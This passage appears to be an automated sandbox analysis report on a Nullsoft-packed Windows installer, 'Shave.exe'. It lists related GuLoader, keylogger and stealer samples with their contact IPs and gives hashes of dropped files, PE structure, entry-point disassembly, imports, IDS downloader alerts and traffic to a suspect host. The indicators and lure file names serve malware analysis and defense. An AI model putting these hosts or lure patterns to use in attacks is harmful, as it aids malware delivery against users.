                                                                                                          • 185.244.144.68
                                                                                                          yVVZdG2NJX.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 185.244.144.68
                                                                                                          WC10SCPMaX.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                                          • 185.244.144.68
                                                                                                          Conchoids12.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 185.244.144.68
                                                                                                          Korrekturlsning.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 185.244.144.68
                                                                                                          Conchoids12.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 185.244.144.68
                                                                                                          Korrekturlsning.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 185.244.144.68
                                                                                                          MG-Docu6800001.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 185.244.144.68
                                                                                                          CL714440147.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 185.244.144.68
                                                                                                          TKnBbCiX07.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 185.244.144.68
                                                                                                          TELEGRAMRUPaymentAdvice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          S50MC-C_3170262-7.6cylinder_liner.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          DESIGN LOGO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 149.154.167.220
                                                                                                          ZEcVl5jzXD.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          WV7Gj9lJ7W.exeGet hashmaliciousXWormBrowse
                                                                                                          • 149.154.167.220
                                                                                                          18sFhgSyVK.exeGet hashmaliciousXWormBrowse
                                                                                                          • 149.154.167.220
                                                                                                          21Installer.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                          • 149.154.167.99
                                                                                                          SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 149.154.167.220
                                                                                                          sosoliso.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          PUBLIC-DOMAIN-REGISTRYUShttps://www.google.com.bn/url?snf=vpsBrmjsMjZT0YKBELze&nuu=B4grUxP5T5pV5xJiiFp0&sa=t&ndg=e2p4qPDSQqlwr77oflqr&pdbr=npO0StsDFHvGF7jwYfWY&np=slEjuRPdabbflvaXgHau&cb=IhzFYfcuqq5m2vva4DTH&url=amp%2Fbeutopiantech.com%2Fchd%2FroghgehdjtiE-SURECHDDam9lbC5kZW5vZnJpb0BoYW5lc2NvbXBhbmllcy5jb20=Get hashmaliciousUnknownBrowse
                                                                                                          • 103.211.216.144
                                                                                                          Quote 40240333-REV2.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 199.79.62.115
                                                                                                          DOCS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 207.174.215.249
                                                                                                          Ksciarillo_Reord_Adjustment.docxGet hashmaliciousUnknownBrowse
                                                                                                          • 208.91.198.81
                                                                                                          Ksciarillo_Reord_Adjustment.docxGet hashmaliciousUnknownBrowse
                                                                                                          • 208.91.198.81
                                                                                                          NoteID [4962398] _Secure_Document_Mrettinger-46568.docxGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 208.91.198.81
                                                                                                          SOA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 207.174.215.249
                                                                                                          SFL OP990M3 PO.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 208.91.198.107
                                                                                                          nuevo orden.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 208.91.199.224
                                                                                                          PO ALJAT-5804-2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 199.79.62.115
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          54328bd36c14bd82ddaa0c04b25ed9adNew shipment AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                          • 172.67.177.134
                                                                                                          rorderrequirementsCIF-TRC809910645210.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 172.67.177.134
                                                                                                          PaymentAdvice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 172.67.177.134
                                                                                                          S50MC-C_3170262-7.6cylinder_liner.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 172.67.177.134
                                                                                                          ZEcVl5jzXD.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 172.67.177.134
                                                                                                          Papyment_Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 172.67.177.134
                                                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, VidarBrowse
                                                                                                          • 172.67.177.134
                                                                                                          https://docs.google.com/drawings/d/15fSe2159qP21C2NrS3K5cgcsyPwNINvux6xIUCvvgBU/preview?pli=1AmyVazquez-brian.nester@lvhn.orgGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 172.67.177.134
                                                                                                          PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                          • 172.67.177.134
                                                                                                          sosoliso.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 172.67.177.134
                                                                                                          3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          0Nj1sxmCtr.exeGet hashmaliciousBinder HackTool, QuasarBrowse
                                                                                                          • 149.154.167.220
                                                                                                          FW EBS - Goods for M-PROJECTS - PROFORMA - PAYMENT - SWIFT - DELIVERY ORDER NO. INM303.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 149.154.167.220
                                                                                                          FW EBS - Goods for M-PROJECTS - PROFORMA - PAYMENT - SWIFT - DELIVERY ORDER NO. INM303.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 149.154.167.220
                                                                                                          PaymentAdvice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          S50MC-C_3170262-7.6cylinder_liner.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Outstanding Invoices_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                          • 149.154.167.220
                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          C:\Users\user\AppData\Local\Temp\nsa5D43.tmp\System.dllNew listed items 7648767856387547354734567465647568487.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
                                                                                                            yVVZdG2NJX.exeGet hashmaliciousGuLoaderBrowse
                                                                                                              PaymentAdvice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                S50MC-C_3170262-7.6cylinder_liner.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  ORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                    PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                      Conchoids12.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                        Korrekturlsning.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                          Conchoids12.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            Korrekturlsning.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                              Process:C:\Users\user\Desktop\Shave.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):426485
                                                                                                                              Entropy (8bit):6.941782967507925
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:XSqP0nz1acv+IypUi2YgJEI9fXsnAW8svlsAcyEZHT:XSqP0nz1acv+IypUi2Y81BXs0YsA7aT
                                                                                                                              MD5:2A58FD1E922CDF96470BA55FBE42B1DF
                                                                                                                              SHA1:E92E2EF16C14279E19A91C017665338048044A1C
                                                                                                                              SHA-256:16CE17CFD5B53B1998B6E70E6BEBD375EB1425434A63B81FD299D0C3228FB478
                                                                                                                              SHA-512:DA35D40463348E17CEA2E8444F64323C2AFB5621BFBDA27F88C24E29A9B04E2A2C67F1AF99510A6AB01A83A3E7A333E304B06C6DF98DEE0BE8BDB52E34BF5FE1
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              Process:C:\Users\user\Desktop\Shave.exe
                                                                                                                              File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-12, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 649037107316853453566312041152512.000000
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):286686
                                                                                                                              Entropy (8bit):1.2536158727628404
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:3zbnVKpXfwz53wppkaub35azZSECekyln9KUXjJrv5YQ1ujVNDYb3ezsIhWCUiSL:KH4hI9iE3sLB9pXYzlkOYFWf9
                                                                                                                              MD5:99A5E2E2953D0374F1E23FF8B0B6773F
                                                                                                                              SHA1:5FC3F9C3638DD60012AB2F2ECDD016912BBDB9F3
                                                                                                                              SHA-256:3D1233CB89AD10CCC6972697279A3741F6031E05D32738E9B34D37A230C0F84A
                                                                                                                              SHA-512:1B002C12EAB187B0246483C5F3B0758DC84BCC884E1120A17B0412DFD349972DB5DA04E154AE21D405BA33BBD0C29AADFA7D1BF4D50347146D6DFCCBBD8DA94A
                                                                                                                              Malicious:false
                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                              Preview:.........................................|.........................F........................................................S..............................S.................................................................8....;........................^........................)......"..Y........B................d......................}.........i......................................9.....................................R...............]............................................................I.........u..................................j.....^.....................................................................W..................................................................................m......................................*.....................>..........O........[................................................B............................}..../...............................[.......?.............................Z..#.........................4...............................
                                                                                                                              Process:C:\Users\user\Desktop\Shave.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):73531
                                                                                                                              Entropy (8bit):1.2569404898190384
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:dVICOgr5CpPXeGASSCorJvHtPvpwqcQ+5pPZg71l4oLuZK52Oc410+RaL7VomsEa:dVcPX7U1R9mPZgx1hn32+emD40rd
                                                                                                                              MD5:22148562A5A87FF1BECCAE5E77D87142
                                                                                                                              SHA1:D1B04F09ACFC146855AA02A8C530AA8A45DF3F24
                                                                                                                              SHA-256:B09EF713D0920E9671DA35332C6DAE7C1E12BE409A7077D6CA3E07938F9C08E9
                                                                                                                              SHA-512:3F96B2ABED75C8EA941E45BB3835EF4D5FC92C5C5F829A738641FD398D88BB838E7C22A0F5F998BF387A5CE4ADC77EECAA049BCFB1A9ADD476871C871D58E811
                                                                                                                              Malicious:false
                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                              Preview:......................................................................................x..........................|........................................l...................a.........................................U.....................k..........................................G..................................................................|.....b....................O...R..........n...................&.....................l..................!.......6......... ......S.......................................}........................................7..................................................................................................................................................B......#......b....................60........?.....z.......>..........................:..............%..l...........g...........................=D.....{.....................................&........................{.......................i..........................................5.]............
                                                                                                                              Process:C:\Users\user\Desktop\Shave.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):220203
                                                                                                                              Entropy (8bit):1.262001836842358
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:EBCX3JLNVpAeI+EgywY0Szqqv3ib1RuU7thllrhAKF3+O1jaJgMH8JHuHR6qTSIT:EkLjwqF1z1MoqyH
                                                                                                                              MD5:F8A828CA56113806A25802FF2AF74282
                                                                                                                              SHA1:B016C4258BD1F9A19989E0C6B7AB993ED02DF96F
                                                                                                                              SHA-256:95941451FFB946693877FBD721001ACC32FE70D75EA68CAB1756B3ADF77DCFF4
                                                                                                                              SHA-512:6725AA09040FAC962CCFF2EF9897FB6F3F3706FE60D8C55A69CB9E0C21362B3C8C186C573D647C0A50438686D6035361A4A20138C451E641D507BD1218D1E079
                                                                                                                              Malicious:false
                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                              Preview:...................................................@......................................................................<....................................................O....../..........T.....................................i................................................................,.......................t.....................t.................................{!...................................................................................................X..........s.............@.............C....2................................-..............................w..............................................................H....................I........."..................C.................a................p...6.......................'......................................................................................%.............................x.................Q...................................z..........................i....hv...x.................`..........c.
                                                                                                                              Process:C:\Users\user\Desktop\Shave.exe
                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):11776
                                                                                                                              Entropy (8bit):5.890541747176257
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:X24sihno0bW+l97H4GB7QDs91kMtwtobTr4u+QHbazMNHT7dmNIEr:m8vJl97JeoxtN/r3z7YV
                                                                                                                              MD5:75ED96254FBF894E42058062B4B4F0D1
                                                                                                                              SHA1:996503F1383B49021EB3427BC28D13B5BBD11977
                                                                                                                              SHA-256:A632D74332B3F08F834C732A103DAFEB09A540823A2217CA7F49159755E8F1D7
                                                                                                                              SHA-512:58174896DB81D481947B8745DAFE3A02C150F3938BB4543256E8CCE1145154E016D481DF9FE68DAC6D48407C62CBE20753320EBD5FE5E84806D07CE78E0EB0C4
                                                                                                                              Malicious:false
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                              Joe Sandbox View:
                                                                                                                              • Filename: New listed items 7648767856387547354734567465647568487.exe, Detection: malicious, Browse
                                                                                                                              • Filename: yVVZdG2NJX.exe, Detection: malicious, Browse
                                                                                                                              • Filename: PaymentAdvice.exe, Detection: malicious, Browse
                                                                                                                              • Filename: S50MC-C_3170262-7.6cylinder_liner.exe, Detection: malicious, Browse
                                                                                                                              • Filename: ORDER 20240986 OA.exe, Detection: malicious, Browse
                                                                                                                              • Filename: PayeeAdvice_HK54912_R0038704_37504.exe, Detection: malicious, Browse
                                                                                                                              • Filename: Conchoids12.exe, Detection: malicious, Browse
                                                                                                                              • Filename: Korrekturlsning.exe, Detection: malicious, Browse
                                                                                                                              • Filename: Conchoids12.exe, Detection: malicious, Browse
                                                                                                                              • Filename: Korrekturlsning.exe, Detection: malicious, Browse
                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....oZ...........!..... ...........).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...x....@.......(..............@....reloc..~....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                              Entropy (8bit):7.735301237874728
                                                                                                                              TrID:
                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                              File name:Shave.exe
                                                                                                                              File size:549'424 bytes
                                                                                                                              MD5:51000c141b602569cf44b0f8bec9ecb8
                                                                                                                              SHA1:d7b819dbc26b3e66c99d233c5c7fc86492e626dd
                                                                                                                              SHA256:5b19a26d6e86bbcd6d454baee6ae7c77f1c4ca6017ad965eb79098308346f383
                                                                                                                              SHA512:8b38516298e15002a228424f926552b9abc06fb7fb0da94d78a48fea4c0a861fc5bdbcdf9db733f9644a480b4099d237cd70531b8afa11879562d71dd7ee2283
                                                                                                                              SSDEEP:6144:9lgvTRHy2nGlwzQ7LA+CB+f6tb9PTPgN++6aCUYvIRN3JGrYJfXvk0OFP2lmBLoE:32EI+CnhxC+JaWSRlXMPL6TEHmd3ZhZ8
                                                                                                                              TLSH:0FC4E051F15DE8E7F51B26B18C7ED5301497AA6C95AC420E32AA361A64F335310AFF0F
                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....oZ.................d....:....
                                                                                                                              Icon Hash:38206a6a62666429
                                                                                                                              Entrypoint:0x40336c
                                                                                                                              Entrypoint Section:.text
                                                                                                                              Digitally signed:false
                                                                                                                              Imagebase:0x400000
                                                                                                                              Subsystem:windows gui
                                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                              Time Stamp:0x5A6FED1F [Tue Jan 30 03:57:19 2018 UTC]
                                                                                                                              TLS Callbacks:
                                                                                                                              CLR (.Net) Version:
                                                                                                                              OS Version Major:4
                                                                                                                              OS Version Minor:0
                                                                                                                              File Version Major:4
                                                                                                                              File Version Minor:0
                                                                                                                              Subsystem Version Major:4
                                                                                                                              Subsystem Version Minor:0
                                                                                                                              Import Hash:b34f154ec913d2d2c435cbd644e91687
                                                                                                                              Instruction
                                                                                                                              sub esp, 000002D4h
                                                                                                                              push ebx
                                                                                                                              push esi
                                                                                                                              push edi
                                                                                                                              push 00000020h
                                                                                                                              pop edi
                                                                                                                              xor ebx, ebx
                                                                                                                              push 00008001h
                                                                                                                              mov dword ptr [esp+14h], ebx
                                                                                                                              mov dword ptr [esp+10h], 0040A2E0h
                                                                                                                              mov dword ptr [esp+1Ch], ebx
                                                                                                                              call dword ptr [004080A8h]
                                                                                                                              call dword ptr [004080A4h]
                                                                                                                              and eax, BFFFFFFFh
                                                                                                                              cmp ax, 00000006h
                                                                                                                              mov dword ptr [007A8A2Ch], eax
                                                                                                                              je 00007FEFB87ECCF3h
                                                                                                                              push ebx
                                                                                                                              call 00007FEFB87EFFA5h
                                                                                                                              cmp eax, ebx
                                                                                                                              je 00007FEFB87ECCE9h
                                                                                                                              push 00000C00h
                                                                                                                              call eax
                                                                                                                              mov esi, 004082B0h
                                                                                                                              push esi
                                                                                                                              call 00007FEFB87EFF1Fh
                                                                                                                              push esi
                                                                                                                              call dword ptr [00408150h]
                                                                                                                              lea esi, dword ptr [esi+eax+01h]
                                                                                                                              cmp byte ptr [esi], 00000000h
                                                                                                                              jne 00007FEFB87ECCCCh
                                                                                                                              push 0000000Ah
                                                                                                                              call 00007FEFB87EFF78h
                                                                                                                              push 00000008h
                                                                                                                              call 00007FEFB87EFF71h
                                                                                                                              push 00000006h
                                                                                                                              mov dword ptr [007A8A24h], eax
                                                                                                                              call 00007FEFB87EFF65h
                                                                                                                              cmp eax, ebx
                                                                                                                              je 00007FEFB87ECCF1h
                                                                                                                              push 0000001Eh
                                                                                                                              call eax
                                                                                                                              test eax, eax
                                                                                                                              je 00007FEFB87ECCE9h
                                                                                                                              or byte ptr [007A8A2Fh], 00000040h
                                                                                                                              push ebp
                                                                                                                              call dword ptr [00408044h]
                                                                                                                              push ebx
                                                                                                                              call dword ptr [004082A0h]
                                                                                                                              mov dword ptr [007A8AF8h], eax
                                                                                                                              push ebx
                                                                                                                              lea eax, dword ptr [esp+34h]
                                                                                                                              push 000002B4h
                                                                                                                              push eax
                                                                                                                              push ebx
                                                                                                                              push 0079FEE0h
                                                                                                                              call dword ptr [00408188h]
                                                                                                                              push 0040A2C8h
                                                                                                                              Programming Language:
                                                                                                                              • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c70000x17000.rsrc
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                              .text0x10000x64000x6400eed0986138e3ef22dbb386f4760a55c0False0.6783203125data6.511089687733535IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                              .rdata0x80000x138e0x14002914bac53cd4485c9822093463e4eea6False0.4509765625data5.146454805063938IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              .data0xa0000x39eb380x60009e0c528682cd2747c63b7ba39c2cc23unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                              .ndata0x3a90000x1e0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                              .rsrc0x3c70000x170000x17000c8f8279129ad38fd03ee7b50a97e5aeaFalse0.21903659986413043data5.096977274603887IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                              RT_BITMAP0x3c73880x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                                              RT_ICON0x3c76f00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.16976221459836743
                                                                                                                              RT_ICON0x3d7f180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.32863070539419087
                                                                                                                              RT_ICON0x3da4c00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.42424953095684803
                                                                                                                              RT_ICON0x3db5680xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.30730277185501065
                                                                                                                              RT_ICON0x3dc4100x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.32445848375451264
                                                                                                                              RT_ICON0x3dccb80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.2579479768786127
                                                                                                                              RT_ICON0x3dd2200x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6374113475177305
                                                                                                                              RT_DIALOG0x3dd6880x144dataEnglishUnited States0.5216049382716049
                                                                                                                              RT_DIALOG0x3dd7d00x13cdataEnglishUnited States0.5506329113924051
                                                                                                                              RT_DIALOG0x3dd9100x100dataEnglishUnited States0.5234375
                                                                                                                              RT_DIALOG0x3dda100x11cdataEnglishUnited States0.6056338028169014
                                                                                                                              RT_DIALOG0x3ddb300xc4dataEnglishUnited States0.5918367346938775
                                                                                                                              RT_DIALOG0x3ddbf80x60dataEnglishUnited States0.7291666666666666
                                                                                                                              RT_GROUP_ICON0x3ddc580x68dataEnglishUnited States0.7211538461538461
                                                                                                                              RT_MANIFEST0x3ddcc00x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                                                              DLLImport
                                                                                                                              KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                              USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                                              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                              SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                                                              ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                              COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                              ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                              EnglishUnited States
                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                              2024-11-25T07:08:42.598864+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549751185.244.144.6880TCP
                                                                                                                              2024-11-25T07:08:49.051470+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549757193.122.130.080TCP
                                                                                                                              2024-11-25T07:08:51.707734+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549757193.122.130.080TCP
                                                                                                                              2024-11-25T07:08:53.389422+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549777172.67.177.134443TCP
                                                                                                                              2024-11-25T07:08:57.145241+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549779193.122.130.080TCP
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Nov 25, 2024 07:08:41.047117949 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:41.166784048 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:41.166865110 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:41.167156935 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:41.286597013 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:42.598359108 CET8049751185.244.144.68192.168.2.5
